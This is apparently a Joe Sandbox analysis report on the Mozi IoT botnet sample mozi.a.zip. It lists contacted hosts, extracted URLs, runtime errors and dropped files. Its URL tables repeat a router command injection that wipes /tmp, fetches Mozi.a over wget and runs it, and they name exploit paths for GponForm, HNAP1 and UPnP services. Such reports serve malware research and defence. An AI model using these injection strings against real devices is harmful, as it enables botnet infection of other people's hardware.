              http://HTTP/1.10%Avira URL Cloudsafe
              http://113.161.185.44:80/HNAP1/0%Avira URL Cloudsafe
              http://190.189.194.46:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
              http://%s:%d/Mozi.a;sh$0%Avira URL Cloudsafe
              http://74.79.213.38:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              dht.transmissionbt.com
              212.129.33.59
              truefalse
                high
                bttracker.acc.umu.se
                130.239.18.159
                truefalse
                  high
                  router.bittorrent.com
                  67.215.246.10
                  truefalse
                    high
                    router.utorrent.com
                    82.221.103.244
                    truefalse
                      high
                      bttracker.debian.org
                      unknown
                      unknownfalse
                        high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://13.89.231.175:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                        • Avira URL Cloud: safe
                        unknown
                        http://127.0.0.1:80/GponForm/diag_Form?images/true
                        • Avira URL Cloud: safe
                        unknown
                        http://180.254.107.55:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                        • Avira URL Cloud: safe
                        unknown
                        http://175.203.81.2:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                        • Avira URL Cloud: safe
                        unknown
                        http://23.12.191.118:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                        • Avira URL Cloud: safe
                        unknown
                        http://193.248.153.76:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                        • Avira URL Cloud: safe
                        unknown
                        http://23.254.64.88:80/HNAP1/true
                        • Avira URL Cloud: safe
                        unknown
                        http://159.140.205.214:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                        • Avira URL Cloud: safe
                        unknown
                        http://34.66.226.190:80/HNAP1/true
                        • Avira URL Cloud: safe
                        unknown
                        http://47.246.22.230:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                        • Avira URL Cloud: safe
                        unknown
                        http://144.76.43.37:80/HNAP1/true
                        • Avira URL Cloud: safe
                        unknown
                        http://24.239.192.38:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                        • Avira URL Cloud: safe
                        unknown
                        http://72.200.237.136:49152/soap.cgi?service=WANIPConn1false
                        • Avira URL Cloud: safe
                        unknown
                        http://23.217.12.208:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                        • Avira URL Cloud: safe
                        unknown
                        http://23.236.242.26:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                        • Avira URL Cloud: safe
                        unknown
                        http://113.161.185.44:80/HNAP1/true
                        • Avira URL Cloud: safe
                        unknown
                        http://190.189.194.46:49152/soap.cgi?service=WANIPConn1false
                        • Avira URL Cloud: safe
                        unknown
                        http://74.79.213.38:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jawstrue
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://pastebin.ca)alsa-info.sh0.8.drfalse
                        • Avira URL Cloud: safe
                        low
                        http://%s:%d/bin.sh;chmodmozi.a.ziptrue
                        • Avira URL Cloud: safe
                        low
                        http://%s:%d/Mozi.a;chmodmozi.a.zipfalse
                        • Avira URL Cloud: safe
                        low
                        http://schemas.xmlsoap.org/soap/encoding/mozi.a.zipfalse
                          high
                          http://%s:%d/Mozi.m;$mozi.a.zipfalse
                          • Avira URL Cloud: safe
                          low
                          http://schemas.xmlsoap.org/soap/envelope/mozi.a.zipfalse
                            high
                            http://127.0.0.1mozi.a.zipfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://baidu.com/%s/%s/%d/%s/%s/%s/%s)mozi.a.zipfalse
                              high
                              http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/.config.8.drfalse
                                high
                                http://www.alsa-project.orgalsa-info.sh0.8.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.pastebin.ca/upload.phpalsa-info.sh0.8.drfalse
                                  high
                                  http://%s:%d/Mozi.mmozi.a.zipfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://www.alsa-project.org/cardinfo-db/alsa-info.sh0.8.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://127.0.0.1sendcmdmozi.a.zipfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEYalsa-info.sh0.8.drfalse
                                    high
                                    http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblahalsa-info.sh0.8.drfalse
                                      high
                                      http://ipinfo.io/ipmozi.a.zipfalse
                                        high
                                        http://%s:%d/Mozi.m;/tmp/Mozi.mmozi.a.zipfalse
                                        • Avira URL Cloud: safe
                                        low
                                        http://%s:%d/bin.shmozi.a.ziptrue
                                        • Avira URL Cloud: safe
                                        low
                                        http://www.pastebin.caalsa-info.sh0.8.drfalse
                                          high
                                          http://purenetworks.com/HNAP1/mozi.a.zipfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.alsa-project.org/alsa-info.shalsa-info.sh0.8.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://%s:%d/Mozi.m;mozi.a.zipfalse
                                          • Avira URL Cloud: safe
                                          low
                                          http://www.alsa-project.org.alsa-info.sh0.8.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://HTTP/1.1mozi.a.zipfalse
                                          • Avira URL Cloud: safe
                                          low
                                          http://%s:%d/Mozi.a;sh$mozi.a.zipfalse
                                          • Avira URL Cloud: safe
                                          low
                                          http://www.pastebin.ca.alsa-info.sh0.8.drfalse
                                            high
                                            http://schemas.xmlsoap.org/soap/envelope//mozi.a.zipfalse
                                              high

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              74.7.13.10
                                              unknownUnited States
                                              17184ATL-CBEYONDUSfalse
                                              171.221.181.48
                                              unknownChina
                                              4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                              178.72.69.126
                                              unknownRussian Federation
                                              44257TNGS-SOUTHRUfalse
                                              84.50.142.113
                                              unknownEstonia
                                              3249ESTPAKEEfalse
                                              26.109.230.217
                                              unknownUnited States
                                              7922COMCAST-7922USfalse
                                              22.142.197.254
                                              unknownUnited States
                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                              44.209.53.252
                                              unknownUnited States
                                              14618AMAZON-AESUSfalse
                                              29.31.10.222
                                              unknownUnited States
                                              7922COMCAST-7922USfalse
                                              158.180.15.87
                                              unknownUnited Kingdom
                                              721DNIC-ASBLK-00721-00726USfalse
                                              11.242.227.131
                                              unknownUnited States
                                              3356LEVEL3USfalse
                                              26.220.204.225
                                              unknownUnited States
                                              7922COMCAST-7922USfalse
                                              93.102.56.19
                                              unknownPortugal
                                              2860NOS_COMUNICACOESPTfalse
                                              187.158.144.73
                                              unknownMexico
                                              8151UninetSAdeCVMXfalse
                                              42.53.76.236
                                              unknownChina
                                              4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                              56.182.70.51
                                              unknownUnited States
                                              2686ATGS-MMD-ASUSfalse
                                              154.3.17.209
                                              unknownUnited States
                                              174COGENT-174USfalse
                                              41.91.67.149
                                              unknownEgypt
                                              33771SAFARICOM-LIMITEDKEfalse
                                              180.254.89.180
                                              unknownIndonesia
                                              7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDfalse
                                              118.241.245.41
                                              unknownJapan2527SO-NETSo-netEntertainmentCorporationJPfalse
                                              19.214.106.48
                                              unknownUnited States
                                              3MIT-GATEWAYSUSfalse
                                              26.254.247.139
                                              unknownUnited States
                                              7922COMCAST-7922USfalse
                                              93.178.240.65
                                              unknownUkraine
                                              6703ALKAR-ASUAfalse
                                              133.214.150.254
                                              unknownJapan2518BIGLOBEBIGLOBEIncJPfalse
                                              44.17.143.194
                                              unknownUnited States
                                              7377UCSDUSfalse
                                              113.153.230.119
                                              unknownJapan2516KDDIKDDICORPORATIONJPfalse
                                              89.157.51.131
                                              unknownFrance
                                              21502ASN-NUMERICABLEFRfalse
                                              189.241.241.142
                                              unknownMexico
                                              8151UninetSAdeCVMXfalse
                                              124.57.147.225
                                              unknownKorea Republic of
                                              17858POWERVIS-AS-KRLGPOWERCOMMKRfalse
                                              69.20.178.197
                                              unknownUnited States
                                              6594RISE-IDAHOUSfalse
                                              81.176.95.215
                                              unknownRussian Federation
                                              8342RTCOMM-ASRUfalse
                                              66.221.30.106
                                              unknownUnited States
                                              54489CORESPACE-DALUSfalse
                                              109.143.31.175
                                              unknownBelgium
                                              5432PROXIMUS-ISP-ASBEfalse
                                              9.14.171.53
                                              unknownUnited States
                                              3356LEVEL3USfalse
                                              16.0.53.131
                                              unknownUnited States
                                              13979ATT-IPFRUSfalse
                                              172.195.124.44
                                              unknownAustralia
                                              18747IFX18747USfalse
                                              21.245.113.206
                                              unknownUnited States
                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                              86.245.98.172
                                              unknownFrance
                                              3215FranceTelecom-OrangeFRfalse
                                              78.101.119.242
                                              unknownQatar
                                              42298GCC-MPLS-PEERINGGCCMPLSpeeringQAfalse
                                              94.185.237.35
                                              unknownUnited Kingdom
                                              8190MDNXGBfalse
                                              102.37.69.46
                                              unknownSouth Africa
                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                              68.238.109.13
                                              unknownUnited States
                                              701UUNETUSfalse
                                              21.176.167.107
                                              unknownUnited States
                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                              106.63.191.143
                                              unknownChina
                                              4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                              144.57.215.199
                                              unknownSweden
                                              39052SKANSKANET-ASSEfalse
                                              84.230.234.235
                                              unknownFinland
                                              719ELISA-ASHelsinkiFinlandEUfalse
                                              126.172.220.14
                                              unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
                                              174.231.155.97
                                              unknownUnited States
                                              22394CELLCOUSfalse
                                              122.128.194.105
                                              unknownKorea Republic of
                                              9757CMBI-AS-KRCMBDONDAEMOONBROADCASTINGKRfalse
                                              111.169.102.97
                                              unknownJapan2518BIGLOBEBIGLOBEIncJPfalse
                                              51.190.88.233
                                              unknownUnited Kingdom
                                              210278SKYIT-BBITfalse
                                              1.71.162.33
                                              unknownChina
                                              132147CT-SHANXI-MANNo3Shu-MaRoadCNfalse
                                              173.153.15.142
                                              unknownUnited States
                                              10507SPCSUSfalse
                                              157.39.16.40
                                              unknownIndia
                                              55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                                              80.254.91.193
                                              unknownMalta
                                              15735DATASTREAM-NETMTfalse
                                              35.210.136.245
                                              unknownUnited States
                                              19527GOOGLE-2USfalse
                                              89.89.90.95
                                              unknownFrance
                                              5410BOUYGTEL-ISPFRfalse
                                              152.118.36.40
                                              unknownIndonesia
                                              3382ERX-JUITA-UINETUniversityofIndonesiaIDfalse
                                              222.46.68.216
                                              unknownChina
                                              9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                                              26.31.214.72
                                              unknownUnited States
                                              7922COMCAST-7922USfalse
                                              203.252.111.5
                                              unknownKorea Republic of
                                              4766KIXS-AS-KRKoreaTelecomKRfalse
                                              55.44.238.153
                                              unknownUnited States
                                              306DNIC-ASBLK-00306-00371USfalse
                                              7.200.67.208
                                              unknownUnited States
                                              3356LEVEL3USfalse
                                              44.60.150.38
                                              unknownUnited States
                                              7377UCSDUSfalse
                                              207.23.25.29
                                              unknownCanada
                                              271BCNET-ASCAfalse
                                              91.117.98.122
                                              unknownSpain
                                              12334Galicia-SpainESfalse
                                              125.31.207.97
                                              unknownChina
                                              17622CNCGROUP-GZChinaUnicomGuangzhounetworkCNfalse
                                              82.253.85.237
                                              unknownFrance
                                              12322PROXADFRfalse
                                              41.232.91.226
                                              unknownEgypt
                                              8452TE-ASTE-ASEGfalse
                                              171.198.145.203
                                              unknownUnited States
                                              10794BANKAMERICAUSfalse
                                              185.68.99.43
                                              unknownNetherlands
                                              201650WEBGURUNLfalse
                                              113.113.18.44
                                              unknownChina
                                              4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                              104.174.200.127
                                              unknownUnited States
                                              20001TWC-20001-PACWESTUSfalse
                                              81.179.119.252
                                              unknownUnited Kingdom
                                              9105TISCALI-UKTalkTalkCommunicationsLimitedGBfalse
                                              175.159.53.19
                                              unknownHong Kong
                                              7651LINGNAN-AS-APLingnanUniversityHKfalse
                                              13.92.116.235
                                              unknownUnited States
                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                              94.178.218.143
                                              unknownUkraine
                                              6849UKRTELNETUAfalse
                                              184.216.173.25
                                              unknownUnited States
                                              10507SPCSUSfalse
                                              171.159.91.232
                                              unknownUnited States
                                              10794BANKAMERICAUSfalse
                                              189.222.218.142
                                              unknownMexico
                                              8151UninetSAdeCVMXfalse
                                              152.125.208.240
                                              unknownUnited States
                                              29992VA-TMP-COREUSfalse
                                              97.70.224.8
                                              unknownUnited States
                                              33363BHN-33363USfalse
                                              209.232.145.19
                                              unknownUnited States
                                              23024OCDEUSfalse
                                              153.38.105.79
                                              unknownUnited States
                                              701UUNETUSfalse
                                              177.115.79.211
                                              unknownBrazil
                                              26599TELEFONICABRASILSABRfalse
                                              153.48.151.95
                                              unknownUnited States
                                              1226CTA-42-AS1226USfalse
                                              215.164.157.85
                                              unknownUnited States
                                              721DNIC-ASBLK-00721-00726USfalse
                                              134.35.254.248
                                              unknownYemen
                                              30873PTC-YEMENNETYEfalse
                                              117.83.171.37
                                              unknownChina
                                              4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                              82.129.200.140
                                              unknownEgypt
                                              24835RAYA-ASEGfalse
                                              161.118.201.239
                                              unknownJapan13041CESCA-ACESfalse
                                              42.55.27.34
                                              unknownChina
                                              4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                              148.132.232.29
                                              unknownUnited States
                                              6400CompaniaDominicanadeTelefonosSADOfalse
                                              17.73.154.133
                                              unknownUnited States
                                              714APPLE-ENGINEERINGUSfalse
                                              51.74.229.172
                                              unknownUnited States
                                              2686ATGS-MMD-ASUSfalse
                                              90.178.36.52
                                              unknownCzech Republic
                                              5610O2-CZECH-REPUBLICCZfalse
                                              158.119.251.77
                                              unknownUnited Kingdom
                                              49278NORDEFNOfalse
                                              172.101.9.198
                                              unknownUnited States
                                              11351TWC-11351-NORTHEASTUSfalse
                                              173.63.104.87
                                              unknownUnited States
                                              701UUNETUSfalse
                                              113.24.165.118
                                              unknownChina
                                              4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                              184.253.253.190
                                              unknownUnited States
                                              10507SPCSUSfalse

                                              General Information

                                              Joe Sandbox Version:31.0.0 Emerald
                                              Analysis ID:349551
                                              Start date:06.02.2021
                                              Start time:11:34:42
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 8m 59s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:mozi.a.zip
                                              Cookbook file name:defaultlinuxfilecookbook.jbs
                                              Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
                                              Analysis Mode:default
                                              Detection:MAL
                                              Classification:mal100.spre.troj.evad.linZIP@0/221@4/0
                                              Warnings:
                                              Show All
                                              • Excluded IPs from analysis (whitelisted): 91.189.92.39, 91.189.92.41, 91.189.92.20, 91.189.92.19, 91.189.92.40, 91.189.92.38
                                              • TCP Packets have been reduced to 100
                                              • Created / dropped Files have been reduced to 100
                                              • Excluded domains from analysis (whitelisted): api.snapcraft.io
                                              • VT rate limit hit for: http://127.0.0.1:80/GponForm/diag_Form?images/


                                              Runtime Messages

                                              Command:/tmp/mozi.a.zip
                                              Exit Code:0
                                              Exit Code Info:
                                              Killed:False
                                              Standard Output:

                                              Standard Error:telnetd: no process found
                                              utelnetd: no process found
                                              scfgmgr: no process found
                                              Unsupported ioctl: cmd=0xffffffff80045705
                                              Unsupported ioctl: cmd=0xffffffff80045705
                                              Unsupported ioctl: cmd=0xffffffff80045705
                                              /bin/sh: 1: cfgtool: not found
                                              /bin/sh: 1: cfgtool: not found
                                              qemu: uncaught target signal 11 (Segmentation fault) - core dumped
                                              Unsupported ioctl: cmd=0xffffffff80045705
                                              Unsupported ioctl: cmd=0xffffffff80045705

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              dht.transmissionbt.comiGet hashmaliciousBrowse
                                              • 212.129.33.59
                                              Mozi.mGet hashmaliciousBrowse
                                              • 87.98.162.88
                                              Photo.exeGet hashmaliciousBrowse
                                              • 87.98.162.88
                                              ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
                                              • 212.129.33.59
                                              new.exeGet hashmaliciousBrowse
                                              • 87.98.162.88
                                              popcorntime.apkGet hashmaliciousBrowse
                                              • 87.98.162.88
                                              router.bittorrent.comyVn2ywuhEC.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              bin.shGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              iGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              Mozi.mGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              Photo.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              BitTorrent.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              3.4.5_41712.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              ace-stream-3-1-1-multi-win.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              new.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              uTorrent Stable(3.4.2 build 37754).exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              3.4.2 build 37754.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              download.ap.bittorrent.com/track/stable/endpoint/utorrent/os/windowsGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              .iGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              index.htmlGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              QsCC5s5NrR.exeGet hashmaliciousBrowse
                                              • 67.215.246.10
                                              router.utorrent.comyVn2ywuhEC.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              bin.shGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              iGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              Mozi.mGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              Photo.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              BitTorrent.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              3.4.5_41712.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              new.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              uTorrent Stable(3.4.2 build 37754).exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              3.4.2 build 37754.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              download.ap.bittorrent.com/track/stable/endpoint/utorrent/os/windowsGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              uTorrent.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              .iGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              index.htmlGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              QsCC5s5NrR.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              BitTorrent.exeGet hashmaliciousBrowse
                                              • 82.221.103.244
                                              bttracker.acc.umu.sebin.shGet hashmaliciousBrowse
                                              • 130.239.18.159
                                              iGet hashmaliciousBrowse
                                              • 130.239.18.159
                                              Mozi.mGet hashmaliciousBrowse
                                              • 130.239.18.159
                                              Photo.exeGet hashmaliciousBrowse
                                              • 130.239.18.159
                                              new.exeGet hashmaliciousBrowse
                                              • 130.239.18.159

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              CHINANET-BACKBONENo31Jin-rongStreetCNsvchust.exeGet hashmaliciousBrowse
                                              • 113.62.231.33
                                              #U4e2d#U8f6c#U8d44#U91d1#U6838#U5bf9818.exeGet hashmaliciousBrowse
                                              • 106.111.183.214
                                              #U51fa#U5165#U6b3e#U4e2d#U8f6c#U660e#U7ec6#U886821#U53f7.exeGet hashmaliciousBrowse
                                              • 117.93.60.164
                                              yVn2ywuhEC.exeGet hashmaliciousBrowse
                                              • 183.167.31.157
                                              c5twLLnwwY.exeGet hashmaliciousBrowse
                                              • 118.180.30.35
                                              WUHU95Apq3Get hashmaliciousBrowse
                                              • 120.41.245.113
                                              bin.shGet hashmaliciousBrowse
                                              • 222.240.82.124
                                              svchost.exeGet hashmaliciousBrowse
                                              • 36.98.102.89
                                              oHqMFmPndx.exeGet hashmaliciousBrowse
                                              • 171.11.246.22
                                              fil1Get hashmaliciousBrowse
                                              • 60.174.151.81
                                              mssecsvr.exeGet hashmaliciousBrowse
                                              • 218.4.57.194
                                              mssecsvc.exeGet hashmaliciousBrowse
                                              • 121.33.106.242
                                              iGet hashmaliciousBrowse
                                              • 182.39.215.123
                                              Mozi.mGet hashmaliciousBrowse
                                              • 117.47.222.71
                                              SecuriteInfo.com.Trojan.GenericKD.35624799.30696.exeGet hashmaliciousBrowse
                                              • 27.128.211.1
                                              svchost.exeGet hashmaliciousBrowse
                                              • 117.92.12.73
                                              dTCaJ7tQjT.exeGet hashmaliciousBrowse
                                              • 27.185.14.143
                                              NormhjTcQb.exeGet hashmaliciousBrowse
                                              • 27.24.160.234
                                              xJbFpiVs1lGet hashmaliciousBrowse
                                              • 117.44.88.152
                                              SecuriteInfo.com.Trojan.BtcMine.3311.17146.exeGet hashmaliciousBrowse
                                              • 219.148.191.225
                                              COMCAST-7922UShse8DRMQnI.exeGet hashmaliciousBrowse
                                              • 24.3.111.215
                                              yVn2ywuhEC.exeGet hashmaliciousBrowse
                                              • 67.167.124.173
                                              ZjPOfkD2zH.exeGet hashmaliciousBrowse
                                              • 96.64.86.130
                                              WUHU95Apq3Get hashmaliciousBrowse
                                              • 96.170.80.182
                                              bin.shGet hashmaliciousBrowse
                                              • 26.20.176.82
                                              davay (2).exeGet hashmaliciousBrowse
                                              • 50.198.141.161
                                              davay.exeGet hashmaliciousBrowse
                                              • 24.131.82.168
                                              oHqMFmPndx.exeGet hashmaliciousBrowse
                                              • 73.42.52.168
                                              mssecsvc.exeGet hashmaliciousBrowse
                                              • 50.248.89.44
                                              fil1Get hashmaliciousBrowse
                                              • 24.218.235.39
                                              mssecsvr.exeGet hashmaliciousBrowse
                                              • 50.143.226.237
                                              mssecsvc.exeGet hashmaliciousBrowse
                                              • 25.163.216.128
                                              iGet hashmaliciousBrowse
                                              • 28.213.170.69
                                              Mozi.mGet hashmaliciousBrowse
                                              • 25.130.210.228
                                              svchost.exeGet hashmaliciousBrowse
                                              • 50.217.89.159
                                              utox.exeGet hashmaliciousBrowse
                                              • 73.74.102.47
                                              990109.exeGet hashmaliciousBrowse
                                              • 50.211.16.74
                                              sample4.dllGet hashmaliciousBrowse
                                              • 73.166.10.38
                                              sample2.dllGet hashmaliciousBrowse
                                              • 73.166.10.38
                                              New Doc 2020-12-21 09.53.07_8.docGet hashmaliciousBrowse
                                              • 67.170.250.203
                                              ESTPAKEEDirectoInstall.vbsGet hashmaliciousBrowse
                                              • 90.190.150.210
                                              Mozi.aGet hashmaliciousBrowse
                                              • 213.35.235.171
                                              PDFXCview.exeGet hashmaliciousBrowse
                                              • 85.29.223.247
                                              Emotet.docGet hashmaliciousBrowse
                                              • 194.126.101.114
                                              Emotet2.docGet hashmaliciousBrowse
                                              • 194.126.101.116
                                              dGb6pfsOb9.exeGet hashmaliciousBrowse
                                              • 194.126.101.119
                                              dWxj4g7h3wGet hashmaliciousBrowse
                                              • 90.191.214.101
                                              8Hj7AwNyOC.exeGet hashmaliciousBrowse
                                              • 195.50.193.131
                                              EBookCodec.exeGet hashmaliciousBrowse
                                              • 84.50.47.72
                                              uHTaztm0Zh.exeGet hashmaliciousBrowse
                                              • 195.50.193.131
                                              ATL-CBEYONDUSFederalAgency.x86Get hashmaliciousBrowse
                                              • 69.198.97.41

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              /etc/init.d/S95baby.shbin.shGet hashmaliciousBrowse
                                                iGet hashmaliciousBrowse
                                                  Mozi.mGet hashmaliciousBrowse
                                                    Mozi.mGet hashmaliciousBrowse
                                                      1skm346XtzGet hashmaliciousBrowse
                                                        Mozi.aGet hashmaliciousBrowse
                                                          Mozi.1.mGet hashmaliciousBrowse
                                                            6wuvHEBHt8.binGet hashmaliciousBrowse
                                                              7v1ic5IS8IGet hashmaliciousBrowse
                                                                Mozi.aGet hashmaliciousBrowse
                                                                  Mozi.aGet hashmaliciousBrowse
                                                                    Mozi.mGet hashmaliciousBrowse
                                                                      Mozi.mGet hashmaliciousBrowse
                                                                        Mozi.mGet hashmaliciousBrowse
                                                                          bad_fileGet hashmaliciousBrowse
                                                                            mxjzQQFgLpGet hashmaliciousBrowse
                                                                              JrAL1wW1MQGet hashmaliciousBrowse
                                                                                /etc/rcS.d/S95baby.shbin.shGet hashmaliciousBrowse
                                                                                  iGet hashmaliciousBrowse
                                                                                    Mozi.mGet hashmaliciousBrowse
                                                                                      Mozi.mGet hashmaliciousBrowse
                                                                                        1skm346XtzGet hashmaliciousBrowse
                                                                                          Mozi.aGet hashmaliciousBrowse
                                                                                            Mozi.1.mGet hashmaliciousBrowse
                                                                                              6wuvHEBHt8.binGet hashmaliciousBrowse
                                                                                                7v1ic5IS8IGet hashmaliciousBrowse
                                                                                                  Mozi.aGet hashmaliciousBrowse
                                                                                                    Mozi.aGet hashmaliciousBrowse
                                                                                                      Mozi.mGet hashmaliciousBrowse
                                                                                                        Mozi.mGet hashmaliciousBrowse
                                                                                                          Mozi.mGet hashmaliciousBrowse
                                                                                                            bad_fileGet hashmaliciousBrowse
                                                                                                              mxjzQQFgLpGet hashmaliciousBrowse
                                                                                                                JrAL1wW1MQGet hashmaliciousBrowse

                                                                                                                  Created / dropped Files

                                                                                                                  /boot/grub/i386-pc/modinfo.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/acpi/asus-keyboard-backlight.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):326
                                                                                                                  Entropy (8bit):5.2904323771702915
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:K8K2A6godGINKlsX3stINKVHBfNewdrCDjwFhD2UDKVHxMn:1f/NA23stIN8HdNTek3n8HWn
                                                                                                                  MD5:626FDB50CA17F4E2BAAB79F09F3EB73B
